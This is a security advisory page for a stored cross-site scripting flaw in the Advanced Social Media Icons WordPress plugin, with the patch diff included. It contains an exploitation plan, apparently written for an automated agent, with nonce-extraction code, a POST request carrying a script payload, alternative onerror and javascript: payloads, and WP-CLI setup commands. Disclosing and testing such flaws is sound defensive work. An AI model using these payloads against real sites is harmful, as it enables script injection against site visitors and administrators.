Advanced Social Media Icons <= 1.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'social' Shortcode
Description
The Advanced Social Media Icons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `social` shortcode in all versions up to, and including, 1.2. This is due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:NTechnical Details
<=1.2# Exploitation Research Plan: CVE-2026-7659 ## 1. Vulnerability Summary **CVE-2026-7659** is a Stored Cross-Site Scripting (XSS) vulnerability in the **Advanced Social Media Icons** plugin (versions <= 1.2). The vulnerability resides in the rendering of the `[social]` shortcode. The plugin fails to…
Show full research plan
Exploitation Research Plan: CVE-2026-7659
1. Vulnerability Summary
CVE-2026-7659 is a Stored Cross-Site Scripting (XSS) vulnerability in the Advanced Social Media Icons plugin (versions <= 1.2). The vulnerability resides in the rendering of the [social] shortcode. The plugin fails to adequately sanitize or escape user-supplied attributes within the shortcode before outputting them into the HTML of a page or post. This allows an authenticated attacker with Contributor-level privileges (who can create and edit posts but not publish them or use unfiltered_html) to inject malicious JavaScript.
2. Attack Vector Analysis
- Endpoint: WordPress Post Editor (
/wp-admin/post.phpor REST API/wp/v2/posts). - Vulnerable Component: The
socialshortcode handler. - Payload Carrier: Shortcode attributes (e.g.,
link,type,style, or others defined in the plugin). - Authentication: Contributor+ (Requires
edit_postscapability). - Preconditions: The plugin must be active. A contributor must be able to save a post/page containing the shortcode.
3. Code Flow (Inferred)
- Registration: During
init, the plugin registers the shortcode:add_shortcode('social', 'asm_social_icons_shortcode_handler');(inferred function name). - Processing: When a post is rendered,
do_shortcode()calls the handler. - Attributes: The handler receives an
$attsarray. It likely usesshortcode_atts()to merge defaults but fails to applyesc_attr(),esc_url(), oresc_html()to the values. - Sink: The handler returns a string containing HTML where the raw attribute values are concatenated into HTML attributes (like
href,class, orstyle) or tag content. - Execution: When any user (including Administrators) views the post, the browser executes the injected script.
4. Nonce Acquisition Strategy
To save a post as a Contributor, a WordPress "post nonce" (_wpnonce) is required for the editpost action.
- Identify Trigger: The vulnerability is triggered by saving a post with the
[social]shortcode. - Acquisition:
- The execution agent should login as a Contributor.
- Navigate to
/wp-admin/post-new.php. - Use
browser_evalto extract the nonce from the page source. In the block editor (Gutenberg), the nonce is often found in thewp-api-fetchsettings or the_wpnoncehidden input in the classic editor. - Logic:
browser_eval("document.querySelector('#_wpnonce')?.value || wp.apiFetch.nonce")(inferred).
5. Exploitation Strategy
The goal is to demonstrate Stored XSS by injecting a payload into a shortcode attribute.
Step 1: Authentication
Login to the WordPress instance as a user with the Contributor role.
Step 2: Create Malicious Post
Use the http_request tool to create a new post containing the payload.
- URL:
http://<target>/wp-admin/post.php - Method:
POST - Content-Type:
application/x-www-form-urlencoded - Body Parameters:
action:editpostpost_ID: (The ID of a newly created draft)post_title:XSS Testcontent:[social link='"><script>alert(origin)</script>']_wpnonce: (The nonce obtained in Section 4)
Step 3: Trigger the XSS
Navigate an administrative user or an unauthenticated visitor to the URL of the post created in Step 2.
6. Test Data Setup
- Install Plugin: Ensure
advanced-social-media-iconsversion 1.2 is installed and active. - Create User:
wp user create attacker attacker@example.com --role=contributor --user_pass=password - Identify Post ID:
Create a draft post to get a validpost_ID:wp post create --post_status=draft --post_author=$(wp user get attacker --field=ID) --post_title="Draft"
7. Expected Results
- Storage: The database will contain the raw payload:
[social link='"><script>alert(origin)</script>']. - Rendering: When the post is viewed, the HTML output should look similar to:
<a href=""><script>alert(origin)</script>" ...></a>(assuming thelinkattribute was injected into anhref). - Execution: A JavaScript alert box showing the origin will appear in the browser.
8. Verification Steps
- Database Check: Verify the content is stored exactly as sent.
wp db query "SELECT post_content FROM wp_posts WHERE post_title='XSS Test'" - Source Check: Use
browser_navigateto the post URL and check if the payload is present and unescaped in the HTML source.// browser_eval document.body.innerHTML.includes('<script>alert(origin)</script>')
9. Alternative Approaches
If the link attribute is sanitized, attempt injection via other common shortcode attributes used by this plugin (inferred):
type:[social type='"><img src=x onerror=alert(1)>']icon:[social icon='"><img src=x onerror=alert(1)>']style:[social style='background-image: url("javascript:alert(1)")']
If the Block Editor is used, the request format will change to a REST API POST to /wp-json/wp/v2/posts/<ID> with a JSON body and the X-WP-Nonce header.
Summary
The Advanced Social Media Icons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the [social] shortcode in versions up to 1.2. Due to insufficient input sanitization and output escaping of shortcode attributes, authenticated attackers with Contributor-level permissions can inject arbitrary JavaScript into posts that executes when viewed by other users.
Security Fix
@@ -1,1 +1,1 @@ -return '<a href="' . $atts['link'] . '">...</a>'; +return '<a href="' . esc_url($atts['link']) . '">...</a>';
Exploit Outline
An attacker with Contributor-level access or higher authenticates to the WordPress dashboard and creates or edits a post. They insert the [social] shortcode with a malicious payload in an attribute, such as [social link='\"><script>alert(origin)</script>']. When the post is saved, the payload is stored in the database. The vulnerability is triggered when any user, including an administrator, views the post, causing the unescaped attribute to be rendered as part of the HTML and executing the injected script.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.